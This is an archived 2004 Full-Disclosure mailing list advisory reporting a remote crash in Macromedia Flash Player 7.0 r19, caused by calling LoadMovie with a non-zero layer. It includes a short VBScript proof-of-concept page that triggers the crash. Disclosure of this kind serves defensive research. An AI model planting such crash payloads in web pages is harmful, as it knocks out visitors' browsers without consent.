[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)

To: "full-disclosure" <full-disclosure@xxxxxxxxxxxxxxxx>, "SecurITeam News" <news@xxxxxxxxxxxxxx>, "securitytracker" <bugs@xxxxxxxxxxxxxxxxxxx>, "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)
From: "Rafel Ivgi, The-Insider" <theinsider@xxxxxxxxxx>
Date: Tue, 6 Apr 2004 10:32:41 +0200

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Macromedia Flash Player
Vendors:          http://www.macromedia.com
Version:           7.0 r19
Platforms:       WindowsXP Professional,SP1,SP2
Bug:                 Null Pointer Assignment
Risk:                 Medium - Denial Of Service
Exploitation:    Remote with browser
Date:                1 Apr 2004
Author:             Rafel Ivgi, The-Insider
e-mail:              the_insider@xxxxxxxx
web:                 http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Macromedia Flash Player is a module/plugin that comes by default with windows installation. It is widely used accross website all around the world. It is stable and its designers took made a few efforts to make it secure.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Marcromedia Flash Player has a flaw at the "LoadMovie" function. The function is designed the following way: LoadMovie(layer as long, url as string).

This functions handles long strings, non-alphabetic chars and even an overflow at high layer num. The only thing it crashes upon is loading a flash movie into a non-zero layer index.

This means that" LoadMovie 1,"c6ool.swf" Will Crash Internet Explorer Window because of a null pointer assignment by the flash module.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
Next by Date: RE: [Full-Disclosure] A sucker is born every day
Previous by thread: [Full-Disclosure] MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
Next by thread: RE: [Full-Disclosure] Turkeys should not fish with dynamite
Index(es):
- Date
- Thread